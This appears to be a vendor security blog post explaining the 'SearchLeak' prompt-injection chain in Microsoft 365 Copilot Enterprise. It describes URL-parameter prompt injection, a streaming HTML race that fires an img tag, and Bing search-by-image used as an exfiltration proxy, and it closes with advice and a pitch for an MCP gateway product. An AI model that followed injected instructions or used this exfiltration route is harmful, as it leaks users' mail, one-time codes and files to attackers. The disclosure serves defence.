CVE-2026-42824, named "SearchLeak" by Varonis Threat Labs researchers who discovered it, is a critical three-stage vulnerability chain in Microsoft 365 Copilot Enterprise. It allowed an attacker to exfiltrate emails, one-time passwords, password reset links, calendar entries, and indexed organizational files — with a single click on a crafted link and no additional permissions required on the attacker's side. Microsoft patched the vulnerability at the backend in early June 2026 and publicly disclosed it under a critical severity rating on June 15, 2026. No tenant administrator action is required to apply the fix.

The attack targets M365 Copilot Enterprise specifically — the tier with access to the organization's full data estate, including Exchange, SharePoint, OneDrive, and Teams. That scope of access is what made the blast radius significant. Depending on how broadly Copilot was connected to the M365 environment, anything the victim's account could read, Copilot could retrieve and exfiltrate.

How SearchLeak Works: Three Bugs That Shouldn't Exist Together

Varonis chained three distinct weaknesses to produce the attack. Individually, each is insufficient for meaningful exploitation. Together, they give an attacker silent read access to a victim's mailbox and indexed organizational content in a single click.

Stage 1 — Parameter-to-Prompt Injection (P2P). Microsoft 365 Copilot Enterprise Search accepts a q URL parameter for search queries. The problem: that parameter was not treated as user-supplied search input — it was passed directly to Copilot's AI engine as an executable instruction. An attacker who could get a victim to click a crafted m365.cloud.microsoft/search/?q=<PAYLOAD> URL could control what Copilot searched for and what it did with the results. No authentication on the attacker's side. No elevated permissions. Just a link.

Stage 2 — HTML Rendering Race Condition. To prevent AI-generated HTML from executing, Microsoft wrapped Copilot responses in <code> blocks. The catch: this wrapping happened after the streaming response completed. During streaming, raw HTML was temporarily rendered by the browser. An injected <img> tag in the AI's output fired — triggering an outbound HTTP request carrying stolen data — before the sanitizer activated. By the time the guardrail engaged, the request had already left.

Stage 3 — CSP Bypass via Bing SSRF. The browser's Content Security Policy blocked images loading from arbitrary domains. But Bing's "Search by Image" endpoint (bing.com/images/searchbyimage?imgurl=…) was allowlisted in the CSP. When the injected <img> tag pointed to this Bing endpoint with stolen data embedded in the URL parameter, Bing's backend made a server-side fetch to retrieve the "image" from the attacker's server. The CSP applied to the victim's browser, not to Bing's infrastructure. Bing became an unwitting exfiltration proxy.

The complete chain: victim clicks link → Copilot interprets q parameter as search instructions → searches mailbox and indexed org content → generates response with embedded <img> tag → image fires during streaming, before sanitization → Bing fetches attacker URL with stolen data in the path → attacker reads email subjects, OTP codes, file names from server logs. No second click. The crafted link pointed to microsoft.com, bypassing standard anti-phishing URL filters.

Why Do AI Assistants With Broad Data Access Keep Producing This Class of Vulnerability?

SearchLeak isn't the first time M365 Copilot has been the vector for prompt injection-driven data exfiltration. Varonis previously discovered "Reprompt" in Copilot Personal. Similar patterns — AI assistant processes injected instructions from user-controlled inputs, then acts outside the user's actual intent — have been documented across LangChain, AutoGen, and Semantic Kernel deployments.

The structural reason these vulnerabilities keep appearing is a mismatch between how enterprise AI assistants are designed and the threat model they operate under.

Enterprise AI assistants are built to be maximally helpful: search everything the user can access, render rich responses, integrate with the full data estate. The security assumption is that the AI's output represents the user's intent — if Copilot generates an image request or a formatted response, it's acting for the authenticated user, not an attacker who injected instructions into the query string.

Parameter-to-Prompt Injection breaks that assumption at the input layer. If any user-controlled input — a URL parameter, a retrieved document, a calendar event body, a Teams message — can modify what the model believes it should do, the model's output is no longer a reliable proxy for user intent. The same logic applies to indirect prompt injection, where an attacker embeds instructions in a document that an agent later retrieves and processes.

Pre-execution enforcement — checking what the AI is about to do before it does it — doesn't exist at the application layer in most enterprise AI assistants today. They sanitize output. SearchLeak demonstrates why output sanitization as a post-processing step fails when AI responses stream: the side effects fire before the sanitizer catches up.

What Should Teams Running M365 Copilot Do Right Now?

The backend patch closes the specific SearchLeak chain. A few actions are worth taking regardless.

Confirm the patch applies to your tenant. Because Microsoft applied this server-side, no admin action is required — but confirm with your Microsoft account team that your Copilot Enterprise instance is on the patched version, particularly if you operate in a sovereign cloud or GCC environment with delayed rollouts.

Audit Copilot's indexed data scope. The blast radius of SearchLeak depended entirely on what Copilot had read access to. Review what SharePoint sites, Exchange mailboxes, and OneDrive folders Copilot's search index includes, and apply least-privilege — restrict indexing to what users actually need Copilot to reach.

Review M365 Unified Audit Logs for anomalous Copilot Search URL patterns. SearchLeak required a victim to click a crafted URL. If users received suspicious links to Copilot Search between Copilot Enterprise's launch and June 15, log review is warranted. Look for q parameters in the audit logs that contain HTML tags or encoded image URLs pointing to Bing's search-by-image endpoint.

Add P2P injection to your threat model. Any AI system where a URL parameter, tool description, or retrieved document reaches the LLM without strict type enforcement is susceptible to this class of attack. It's not yet standard in most threat modeling frameworks — but it should be.

How Waxell MCP Gateway Handles This Class of Attack

SearchLeak exploited the gap between what an AI assistant was trusted to do and what it actually did once an attacker injected instructions at the input layer. That gap — AI assistants with broad data access operating without a pre-execution enforcement layer — is a governance problem that a patch addresses only in its specific form.

Waxell MCP Gateway sits between AI clients (Claude Desktop, Claude Code, Cursor, and any MCP-compatible client) and the 160+ upstream MCP connectors those clients use. That position — at the tool call boundary, before tool calls execute — lets it enforce controls the AI client itself cannot.

Prompt injection scanner at fingerprint time. When an MCP tool registers with the gateway, Waxell scans its tool descriptions for injected instructions before any agent call reaches it. The P2P injection vector in SearchLeak (malicious instructions passed to the model via a user-controlled input field) is the same class of attack the prompt injection scanner is built to catch in tool description parameters. Tools with injected override instructions are flagged and held for review before a single agent call fires — not after the data has already moved.

PII redaction and secret blocking in-flight. The most operationally damaging output of SearchLeak was one-time passwords, password reset links, and email content. Waxell MCP Gateway strips PII — email addresses, SSNs, financial data — and blocks secrets (security codes, API tokens, password reset links) before they can transit the gateway to any downstream endpoint. The gateway's 50+ policy categories include specific policies for identity, privacy, and content — enforced at 0.045ms p95 latency, meaning governance doesn't introduce meaningful overhead. Even if an injected prompt succeeded in retrieving sensitive content, it couldn't exit the organization's perimeter through the gateway.

Human-in-the-loop approvals for external data sends. The SSRF chain in SearchLeak relied on data leaving the organization via an outbound HTTP request initiated by Bing's backend. Waxell MCP Gateway can require human approval for any tool call that would result in data leaving the organization's environment — surfacing the action for a human reviewer before it completes, rather than letting it fire silently during a streaming response.

Durable audit trail. The gateway maintains an exportable log of every tool call: what the agent requested, what arguments it passed, what the tool returned. A SearchLeak-class exfiltration attempt would appear in the log as an anomalous outbound data pattern. Paired with Waxell Observe, which instruments the AI client side across 200+ libraries and frameworks, you get a full trace from model inference through tool execution.

Microsoft's patch addresses the specific implementation flaw. The governance model addresses the class: any AI assistant with broad data access that lacks a pre-execution enforcement layer at the tool call boundary will remain exposed to variants of this chain as AI assistants expand their integrations.

Try Waxell MCP Gateway free — no rebuild required, one URL replaces all upstream MCP configurations — at waxell.dev/signup.

Frequently Asked Questions

What is CVE-2026-42824 SearchLeak?
CVE-2026-42824 is a critical three-stage vulnerability chain in Microsoft 365 Copilot Enterprise, named SearchLeak by Varonis Threat Labs researchers who discovered it. It combines a Parameter-to-Prompt Injection weakness, an HTML rendering race condition, and a CSP bypass via Bing's server-side request forgery to enable one-click exfiltration of emails, MFA codes, password reset links, and indexed organizational files. Microsoft patched it with a backend fix publicly disclosed on June 15, 2026.

Does SearchLeak require special permissions or multiple steps from the attacker?
No. The attacker needs only to get a victim to click a crafted URL pointing to m365.cloud.microsoft — a legitimate Microsoft domain. No elevated permissions, no plugins, and no second user action are required. From the victim's perspective, Copilot appears to briefly "think" before the exfiltration completes silently in the background.

What data could SearchLeak steal?
Email subject lines and content — including security codes, one-time passwords, and password reset links — calendar meeting details and attendee information, SharePoint documents, OneDrive files, and any other organizational content indexed by Copilot Enterprise Search.

Is patching M365 Copilot enough to prevent similar attacks in the future?
The specific SearchLeak chain is closed. But P2P injection, indirect prompt injection via retrieved content, and SSRF-based exfiltration are a class of attack, not a single bug. Varonis documented this chain in Copilot Enterprise; they previously found a related variant in Copilot Personal. Similar patterns exist in other AI assistant frameworks. AI assistants with broad data access that don't enforce pre-execution controls at the tool call boundary remain exposed to future variants.

What makes SearchLeak different from standard prompt injection?
Standard indirect prompt injection typically requires an attacker to embed malicious instructions in content the model retrieves — a document, a web page, a database row. SearchLeak uses Parameter-to-Prompt injection, where the attack vector is a URL query parameter that Copilot passed directly to its AI engine as an instruction. Combined with a race condition that fires the exfiltration during response streaming before any sanitization pass, it produced a more reliable and lower-friction attack than indirect injection typically achieves.

How does a governance layer at the MCP level help with a vulnerability in a Microsoft product?
The harm in SearchLeak occurred at the tool call layer — Copilot executed a search (tool call), generated a response that triggered an outbound request (side effect), and data left the organization (the actual damage). A governed tool layer that scans descriptions for injection, blocks secrets from exiting the perimeter, and requires human approval for outbound data sends addresses the mechanism of harm rather than only the specific implementation bug. Governance and patching are complementary, not interchangeable.

Sources

• SearchLeak: How We Turned M365 Copilot Into a One-Click Data Exfiltration Weapon — Varonis Threat Labs (primary research, Dolev Taler)

• New attack turned Microsoft 365 Copilot into 1-click data theft tool — BleepingComputer, June 15, 2026

• One-Click Microsoft 365 Copilot Flaw Could Have Let Attackers Steal Emails, Files, and MFA Codes — The Hacker News

• Copilot 'SearchLeak' Attack Allows 1-Click Data Theft — Dark Reading

• SearchLeak vulnerability allows data theft from Microsoft 365 Copilot Enterprise — SC Media